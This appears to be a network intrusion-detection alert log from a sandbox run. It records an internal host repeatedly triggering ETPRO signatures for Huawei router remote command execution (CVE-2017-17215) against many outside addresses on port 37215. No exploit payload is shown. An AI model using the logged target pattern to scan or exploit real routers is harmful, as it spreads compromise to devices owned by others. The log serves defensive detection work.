                                            06/14/24-10:43:45.968268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5926837215192.168.2.14197.33.37.113
                                            06/14/24-10:44:20.828205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6027037215192.168.2.1441.63.245.226
                                            06/14/24-10:44:16.732651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257437215192.168.2.14156.10.155.85
                                            06/14/24-10:43:43.970992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5994237215192.168.2.14156.137.77.48
                                            06/14/24-10:43:39.807300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4105637215192.168.2.1441.154.35.183
                                            06/14/24-10:44:20.804875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4183637215192.168.2.1441.60.251.40
                                            06/14/24-10:43:54.181929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5376237215192.168.2.1441.116.134.73
                                            06/14/24-10:44:08.517850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5243437215192.168.2.14197.100.4.181
                                            06/14/24-10:44:33.151935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5499237215192.168.2.1441.7.87.65
                                            06/14/24-10:43:48.028933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3912437215192.168.2.14197.184.139.121
                                            06/14/24-10:43:43.944645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3550237215192.168.2.14156.153.219.202
                                            06/14/24-10:43:54.203235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4931637215192.168.2.1441.71.134.197
                                            06/14/24-10:44:08.503637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3865037215192.168.2.14156.245.107.179
                                            06/14/24-10:44:16.717183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3376837215192.168.2.14197.254.58.10
                                            06/14/24-10:43:54.185897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5281237215192.168.2.1441.179.184.157
                                            06/14/24-10:43:45.966639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6086637215192.168.2.14197.199.246.198
                                            06/14/24-10:43:56.229974TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5741237215192.168.2.1441.140.131.51
                                            06/14/24-10:44:18.761684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3702037215192.168.2.1441.9.166.61
                                            06/14/24-10:43:43.942170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5417037215192.168.2.14156.213.186.27
                                            06/14/24-10:43:58.292875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3396237215192.168.2.14197.72.233.132
                                            06/14/24-10:43:37.761510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5384437215192.168.2.14197.23.213.44
                                            06/14/24-10:43:54.182621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4931837215192.168.2.14197.170.235.112
                                            06/14/24-10:43:36.725816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4709637215192.168.2.1441.36.107.172
                                            06/14/24-10:43:54.184736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3473837215192.168.2.1441.3.114.31
                                            06/14/24-10:44:08.502056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4605437215192.168.2.14197.61.107.34
                                            06/14/24-10:44:20.829603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4059837215192.168.2.14197.23.237.184
                                            06/14/24-10:43:36.703350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5012637215192.168.2.14156.178.144.38
                                            06/14/24-10:44:24.916196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3921637215192.168.2.14156.97.137.77
                                            06/14/24-10:44:14.668801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3823637215192.168.2.14156.208.128.240
                                            06/14/24-10:44:33.132808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3431237215192.168.2.1441.101.41.172
                                            06/14/24-10:44:26.998643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4901237215192.168.2.14156.166.48.53
                                            06/14/24-10:43:50.115692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5145837215192.168.2.14197.156.171.243
                                            06/14/24-10:44:12.646868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450837215192.168.2.14156.214.227.67
                                            06/14/24-10:44:18.779166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4849437215192.168.2.1441.93.131.182
                                            06/14/24-10:44:29.024437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6048637215192.168.2.1441.3.198.134
                                            06/14/24-10:43:45.966166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131437215192.168.2.14197.34.248.109
                                            06/14/24-10:43:54.198889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4520237215192.168.2.14156.33.198.34
                                            06/14/24-10:44:06.453755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4571237215192.168.2.1441.179.38.50
                                            06/14/24-10:43:43.967600TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6013837215192.168.2.14197.36.164.250
                                            06/14/24-10:44:33.134032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4678037215192.168.2.14156.51.110.2
                                            06/14/24-10:44:22.858826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5875037215192.168.2.1441.246.122.35
                                            06/14/24-10:44:24.941783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4768637215192.168.2.1441.242.214.165
                                            06/14/24-10:43:37.762784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4515637215192.168.2.14197.240.114.83
                                            06/14/24-10:44:26.999448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4894837215192.168.2.14197.20.251.222
                                            06/14/24-10:43:45.969454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3859437215192.168.2.1441.28.101.96
                                            06/14/24-10:44:08.505250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5724437215192.168.2.14156.132.214.39
                                            06/14/24-10:44:31.078671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4100837215192.168.2.1441.153.92.179
                                            06/14/24-10:44:02.384380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5480637215192.168.2.1441.163.187.34
                                            06/14/24-10:44:12.617590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4510237215192.168.2.14197.186.220.68
                                            06/14/24-10:44:16.717377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5208237215192.168.2.14156.222.87.56
                                            06/14/24-10:44:02.382719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5915237215192.168.2.14156.151.237.161
                                            06/14/24-10:43:58.294871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4115237215192.168.2.1441.25.181.120
                                            06/14/24-10:43:41.846849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3982837215192.168.2.1441.236.178.242
                                            06/14/24-10:44:16.717584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3944837215192.168.2.14156.195.130.93
                                            06/14/24-10:43:56.244854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5170637215192.168.2.14156.86.97.0
                                            06/14/24-10:44:20.828232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4226437215192.168.2.1441.248.111.67
                                            06/14/24-10:44:31.057542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5028037215192.168.2.14197.175.167.169
                                            06/14/24-10:43:52.146341TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3951437215192.168.2.14197.228.105.145
                                            06/14/24-10:44:14.689518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3322037215192.168.2.14156.40.237.209
                                            06/14/24-10:44:33.132062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5758237215192.168.2.14197.120.63.17
                                            06/14/24-10:44:12.618401TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6040437215192.168.2.14197.121.66.36
                                            06/14/24-10:44:18.761300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4441037215192.168.2.14197.118.42.54
                                            06/14/24-10:43:39.790986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3437837215192.168.2.14156.63.20.203
                                            06/14/24-10:44:12.644713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4131637215192.168.2.14156.35.26.157
                                            06/14/24-10:44:26.997493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4630437215192.168.2.14156.243.85.121
                                            06/14/24-10:43:41.848254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5397637215192.168.2.14197.14.135.216
                                            06/14/24-10:44:16.717054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3965837215192.168.2.14156.237.18.96
                                            06/14/24-10:43:50.073723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618037215192.168.2.14197.45.183.14
                                            06/14/24-10:44:22.878388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4861237215192.168.2.14197.14.38.108
                                            06/14/24-10:43:50.073031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4537437215192.168.2.14197.155.224.160
                                            06/14/24-10:43:48.030408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941437215192.168.2.14197.132.142.238
                                            06/14/24-10:44:04.421525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4806837215192.168.2.1441.151.20.100
                                            06/14/24-10:44:33.134625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5859637215192.168.2.1441.241.28.106
                                            06/14/24-10:44:31.051460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4169637215192.168.2.14156.60.30.184
                                            06/14/24-10:43:58.290604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5073237215192.168.2.14197.103.227.84
                                            06/14/24-10:44:22.857763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5615037215192.168.2.14197.169.81.72
                                            06/14/24-10:44:24.942044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3378237215192.168.2.14156.35.21.226
                                            06/14/24-10:43:54.183786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5965837215192.168.2.14197.83.238.111
                                            06/14/24-10:43:48.021334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4850037215192.168.2.1441.29.107.107
                                            06/14/24-10:43:48.030533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5847237215192.168.2.1441.164.244.36
                                            06/14/24-10:44:29.023833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4739237215192.168.2.14156.68.46.233
                                            06/14/24-10:44:02.383293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5286437215192.168.2.1441.234.181.21
                                            06/14/24-10:43:48.018352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5379837215192.168.2.14156.7.172.22
                                            06/14/24-10:44:24.915041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5598437215192.168.2.14197.6.23.35
                                            06/14/24-10:44:12.640726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5674637215192.168.2.14197.110.124.111
                                            06/14/24-10:43:45.991487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4989437215192.168.2.14156.31.62.203
                                            06/14/24-10:43:34.660518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4824237215192.168.2.1441.211.225.173
                                            06/14/24-10:43:52.165421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4194837215192.168.2.14156.177.84.16
                                            06/14/24-10:43:54.184536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4034437215192.168.2.14197.212.46.56
                                            06/14/24-10:44:04.412083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4586437215192.168.2.14197.185.114.178
                                            06/14/24-10:43:52.164316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4904037215192.168.2.14156.47.14.64
                                            06/14/24-10:44:00.324507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4760837215192.168.2.1441.208.65.75
                                            06/14/24-10:44:02.366480TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3922037215192.168.2.14156.223.65.183
                                            06/14/24-10:44:12.646489TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4191637215192.168.2.14197.14.175.192
                                            06/14/24-10:44:12.645416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5580037215192.168.2.1441.190.41.89
                                            06/14/24-10:44:20.804505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5372637215192.168.2.14156.160.177.57
                                            06/14/24-10:43:34.662043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5855437215192.168.2.14156.129.96.206
                                            06/14/24-10:44:04.419789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4758437215192.168.2.1441.159.226.192
                                            06/14/24-10:44:26.985991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4435637215192.168.2.14197.61.84.184
                                            06/14/24-10:44:02.387122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3624237215192.168.2.14197.243.164.13
                                            06/14/24-10:43:41.849136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5294637215192.168.2.14156.48.112.59
                                            06/14/24-10:44:08.502447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4641837215192.168.2.14156.143.100.169
                                            06/14/24-10:44:08.504985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3983037215192.168.2.14197.18.97.119
                                            06/14/24-10:44:00.338679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5452637215192.168.2.14156.102.220.115
                                            06/14/24-10:44:02.369069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3982237215192.168.2.14197.223.99.112
                                            06/14/24-10:44:10.562927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4314037215192.168.2.1441.104.183.150
                                            06/14/24-10:44:20.828092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5996637215192.168.2.14156.145.109.216
                                            06/14/24-10:43:52.150037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5696037215192.168.2.14197.64.35.116
                                            06/14/24-10:44:08.501842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5728237215192.168.2.14156.95.250.95
                                            06/14/24-10:44:26.980345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5174837215192.168.2.14197.176.198.122
                                            06/14/24-10:44:14.684977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4886237215192.168.2.14197.0.35.136
                                            06/14/24-10:44:14.666175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4493837215192.168.2.1441.231.173.207
                                            06/14/24-10:44:10.546442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5660037215192.168.2.1441.236.81.104
                                            06/14/24-10:43:56.230740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4553237215192.168.2.14197.198.42.214
                                            06/14/24-10:43:58.277158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5216637215192.168.2.1441.138.28.118
                                            06/14/24-10:44:31.087948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3992437215192.168.2.14197.18.219.94
                                            06/14/24-10:44:18.766660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3823437215192.168.2.14197.96.181.93
                                            06/14/24-10:43:54.198985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4277037215192.168.2.14197.255.76.83
                                            06/14/24-10:43:50.075208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5110237215192.168.2.14197.242.137.33
                                            06/14/24-10:44:14.667010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3956037215192.168.2.14156.22.112.153
                                            06/14/24-10:44:08.503544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3815837215192.168.2.1441.146.120.187
                                            06/14/24-10:43:39.807968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5791837215192.168.2.14197.18.22.160
                                            06/14/24-10:44:24.941756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4218837215192.168.2.14156.230.195.228
                                            06/14/24-10:44:24.915980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4623437215192.168.2.1441.120.177.209
                                            06/14/24-10:44:18.765422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3434237215192.168.2.14197.150.182.128
                                            06/14/24-10:43:43.944298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4680237215192.168.2.14197.167.218.80
                                            06/14/24-10:44:16.734421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5706037215192.168.2.14156.199.72.34
                                            06/14/24-10:44:04.421646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4628837215192.168.2.14156.29.56.135
                                            06/14/24-10:43:34.661830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5151237215192.168.2.1441.17.37.241
                                            06/14/24-10:43:34.661973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5048837215192.168.2.14197.1.228.185
                                            06/14/24-10:43:43.940757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5229437215192.168.2.14197.229.218.53
                                            06/14/24-10:44:06.472622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4991637215192.168.2.14156.55.29.68
                                            06/14/24-10:44:26.980513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4777637215192.168.2.1441.109.5.80
                                            06/14/24-10:44:24.916526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4739637215192.168.2.14197.20.15.226
                                            06/14/24-10:44:26.997327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5113837215192.168.2.14156.52.70.155
                                            06/14/24-10:43:43.941366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5604637215192.168.2.1441.26.113.234
                                            06/14/24-10:44:24.915109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4367237215192.168.2.14197.63.255.53
                                            06/14/24-10:43:58.293504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5885237215192.168.2.1441.103.45.135
                                            06/14/24-10:44:08.502206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3652637215192.168.2.14197.46.115.222
                                            06/14/24-10:44:33.152123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5175637215192.168.2.1441.182.103.155
                                            06/14/24-10:43:34.662326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3374837215192.168.2.14156.124.39.243
                                            06/14/24-10:43:52.143672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4836637215192.168.2.14156.199.172.160
                                            06/14/24-10:44:08.519574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5336637215192.168.2.14197.122.100.249
                                            06/14/24-10:43:48.017807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3641237215192.168.2.14197.191.199.236
                                            06/14/24-10:43:58.294931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4038837215192.168.2.1441.196.201.65
                                            06/14/24-10:44:22.880038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5192437215192.168.2.14156.232.255.103
                                            06/14/24-10:44:00.319628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5637637215192.168.2.1441.232.130.192
                                            06/14/24-10:44:04.419866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432437215192.168.2.14197.85.111.111
                                            06/14/24-10:44:16.716575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4239037215192.168.2.1441.193.63.88
                                            06/14/24-10:43:37.761142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3966437215192.168.2.1441.129.36.124
                                            06/14/24-10:44:14.689241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5536437215192.168.2.14156.215.58.67
                                            06/14/24-10:44:08.520095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3879037215192.168.2.14197.190.155.216
                                            06/14/24-10:43:52.150254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4173837215192.168.2.1441.131.69.236
                                            06/14/24-10:44:02.366685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5939437215192.168.2.1441.197.69.126
                                            06/14/24-10:44:10.545754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4232237215192.168.2.14156.12.253.57
                                            06/14/24-10:43:39.792089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4229237215192.168.2.14197.190.62.144
                                            06/14/24-10:44:10.547554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4479037215192.168.2.14156.12.168.15
                                            06/14/24-10:44:04.409031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4404437215192.168.2.14197.181.22.60
                                            06/14/24-10:43:36.725755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5786037215192.168.2.1441.185.44.230
                                            06/14/24-10:43:41.846675TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6049037215192.168.2.14197.164.6.148
                                            06/14/24-10:44:14.671405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3507637215192.168.2.14156.211.184.194
                                            06/14/24-10:43:39.790763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5182837215192.168.2.14156.123.179.165
                                            06/14/24-10:44:06.471469TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3636037215192.168.2.14156.171.28.182
                                            06/14/24-10:44:04.409767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4387437215192.168.2.14197.153.185.109
                                            06/14/24-10:44:14.682137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5327237215192.168.2.14156.19.73.181
                                            06/14/24-10:43:52.143343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6093437215192.168.2.14197.32.205.87
                                            06/14/24-10:43:39.790147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5334237215192.168.2.1441.124.224.59
                                            06/14/24-10:44:18.777230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3548637215192.168.2.14156.1.44.203
                                            06/14/24-10:44:20.806027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3471037215192.168.2.14156.108.183.216
                                            06/14/24-10:43:54.202997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4443837215192.168.2.1441.47.13.107
                                            06/14/24-10:44:31.055171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4833637215192.168.2.14197.191.85.17
                                            06/14/24-10:43:43.943785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3905437215192.168.2.14156.102.200.202
                                            06/14/24-10:43:50.075299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6057237215192.168.2.14197.94.112.247
                                            06/14/24-10:44:20.807074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3681637215192.168.2.14197.121.255.216
                                            06/14/24-10:43:58.276609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5326237215192.168.2.14156.51.114.128
                                            06/14/24-10:44:12.616454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4166237215192.168.2.14197.74.221.176
                                            06/14/24-10:44:04.411391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4558637215192.168.2.1441.182.36.67
                                            06/14/24-10:43:34.661155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4809437215192.168.2.1441.172.240.153
                                            06/14/24-10:44:02.365918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4045837215192.168.2.1441.122.66.248
                                            06/14/24-10:44:10.543335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4043637215192.168.2.14156.250.157.166
                                            06/14/24-10:43:54.185321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3808637215192.168.2.14156.49.240.0
                                            06/14/24-10:44:02.367886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5817037215192.168.2.14197.144.135.216
                                            06/14/24-10:44:06.451018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5397037215192.168.2.14197.21.107.108
                                            06/14/24-10:43:48.031338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4898437215192.168.2.1441.21.60.149
                                            06/14/24-10:44:02.368293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3942037215192.168.2.1441.153.63.226
                                            06/14/24-10:44:18.765617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5736637215192.168.2.1441.87.70.158
                                            06/14/24-10:43:34.677223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4029037215192.168.2.1441.212.57.218
